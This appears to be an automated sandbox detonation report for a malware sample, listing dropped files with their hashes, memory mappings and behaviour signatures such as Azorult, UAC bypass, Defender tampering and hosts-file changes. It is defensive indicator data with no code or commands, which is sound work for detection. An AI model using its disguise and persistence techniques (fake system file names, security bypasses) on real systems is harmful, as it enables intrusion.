| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
memory/1736-82-0x0000000000000000-mapping.dmp
C:\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\programdata\microsoft\intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
\ProgramData\Microsoft\Intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/1472-89-0x0000000000000000-mapping.dmp
memory/1480-90-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/552-95-0x0000000000000000-mapping.dmp
memory/1716-97-0x0000000000000000-mapping.dmp
memory/1620-96-0x0000000000000000-mapping.dmp
C:\Programdata\Windows\install.bat
| MD5 | db76c882184e8d2bac56865c8e88f8fd |
| SHA1 | fc6324751da75b665f82a3ad0dcc36bf4b91dfac |
| SHA256 | e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a |
| SHA512 | da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92 |
memory/1896-99-0x0000000000000000-mapping.dmp
memory/1740-100-0x0000000000000000-mapping.dmp
memory/1160-102-0x0000000000000000-mapping.dmp
memory/1476-103-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg1.reg
| MD5 | 806734f8bff06b21e470515e314cfa0d |
| SHA1 | d4ef2552f6e04620f7f3d05f156c64888c9c97ee |
| SHA256 | 7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544 |
| SHA512 | 007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207 |
memory/652-105-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg2.reg
| MD5 | 6a5d2192b8ad9e96a2736c8b0bdbd06e |
| SHA1 | 235a78495192fc33f13af3710d0fe44e86a771c9 |
| SHA256 | 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a |
| SHA512 | 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d |
memory/736-108-0x0000000000000000-mapping.dmp
memory/1668-109-0x0000000000000000-mapping.dmp
memory/1724-110-0x0000000000000000-mapping.dmp
memory/2012-111-0x0000000000000000-mapping.dmp
memory/1612-112-0x0000000000000000-mapping.dmp
memory/884-113-0x0000000000000000-mapping.dmp
memory/268-114-0x0000000000000000-mapping.dmp
memory/1764-115-0x0000000000000000-mapping.dmp
memory/1312-116-0x0000000000000000-mapping.dmp
\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1768-119-0x0000000000000000-mapping.dmp
memory/1104-122-0x0000000000000000-mapping.dmp
memory/1708-123-0x0000000000000000-mapping.dmp
memory/1768-124-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-125-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-126-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-127-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-128-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/288-129-0x0000000000000000-mapping.dmp
memory/1064-130-0x0000000000000000-mapping.dmp
memory/1572-131-0x0000000000000000-mapping.dmp
memory/1768-132-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1908-133-0x0000000000000000-mapping.dmp
memory/1628-134-0x0000000000000000-mapping.dmp
memory/436-135-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1476-138-0x0000000000000000-mapping.dmp
memory/436-139-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-140-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-141-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-143-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1944-142-0x0000000000000000-mapping.dmp
memory/436-144-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1664-145-0x0000000000000000-mapping.dmp
memory/1344-146-0x0000000000000000-mapping.dmp
memory/436-148-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/944-147-0x0000000000000000-mapping.dmp
memory/1968-149-0x0000000000000000-mapping.dmp
memory/880-153-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1968-155-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-156-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-157-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-158-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1372-159-0x0000000000000000-mapping.dmp
memory/1712-160-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1968-154-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1448-150-0x0000000000000000-mapping.dmp
memory/1188-163-0x0000000000000000-mapping.dmp
memory/1064-164-0x0000000000000000-mapping.dmp
memory/1220-165-0x0000000000000000-mapping.dmp
memory/1496-166-0x0000000000000000-mapping.dmp
memory/996-167-0x0000000000000000-mapping.dmp
memory/1872-168-0x0000000000000000-mapping.dmp
memory/1628-169-0x0000000000000000-mapping.dmp
memory/1164-170-0x0000000000000000-mapping.dmp
memory/640-171-0x0000000000000000-mapping.dmp
memory/1740-172-0x0000000000000000-mapping.dmp
memory/944-175-0x0000000000000000-mapping.dmp
memory/884-174-0x0000000000000000-mapping.dmp
memory/1832-173-0x0000000000000000-mapping.dmp
memory/880-177-0x0000000000000000-mapping.dmp
memory/1120-176-0x0000000000000000-mapping.dmp
memory/1976-178-0x0000000000000000-mapping.dmp
C:\programdata\microsoft\intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/1712-181-0x0000000000000000-mapping.dmp
memory/1776-182-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/1992-185-0x0000000000000000-mapping.dmp
memory/1908-186-0x0000000000000000-mapping.dmp
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
memory/1600-190-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-191-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-192-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-193-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-194-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\Windows\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat
| MD5 | cfc53d3f9b3716accf268c899f1b0ecb |
| SHA1 | 75b9ae89be46a54ed2606de8d328f81173180b2c |
| SHA256 | f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9 |
| SHA512 | 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4 |
memory/1080-208-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp
\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
memory/1944-217-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-216-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-218-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\ProgramData\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1968-221-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1944-219-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-220-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1944-224-0x0000000000400000-0x00000000009B6000-memory.dmp
\ProgramData\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1204-225-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Programdata\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1944-228-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-229-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1944-230-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1080-209-0x000007FEF37F0000-0x000007FEF4213000-memory.dmp
memory/1080-239-0x00000000025C4000-0x00000000025C7000-memory.dmp
C:\programdata\microsoft\temp\H.bat
| MD5 | 76303bb3bb0faa707000df998d8c9f3d |
| SHA1 | 5b25444c92c7625e1ca77ed2eb1b4ba6877ba066 |
| SHA256 | a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549 |
| SHA512 | 25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c |
C:\ProgramData\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\Programdata\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
C:\programdata\microsoft\temp\Temp.bat
| MD5 | 9380f21201174ac1267aa944e1096955 |
| SHA1 | e97bd59509694d057daaf698a933092f804fe2e3 |
| SHA256 | ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512 |
| SHA512 | ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27 |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
memory/1080-264-0x00000000025CB000-0x00000000025EA000-memory.dmp
memory/1440-272-0x0000000000400000-0x00000000009B6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-16 19:23
Reported
2022-05-16 19:33
Platform
win10v2004-20220414-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Azorult
Modifies Windows Defender Real-time Protection settings
Modifies visiblity of hidden/system files in Explorer
RMS
UAC bypass
Windows security bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
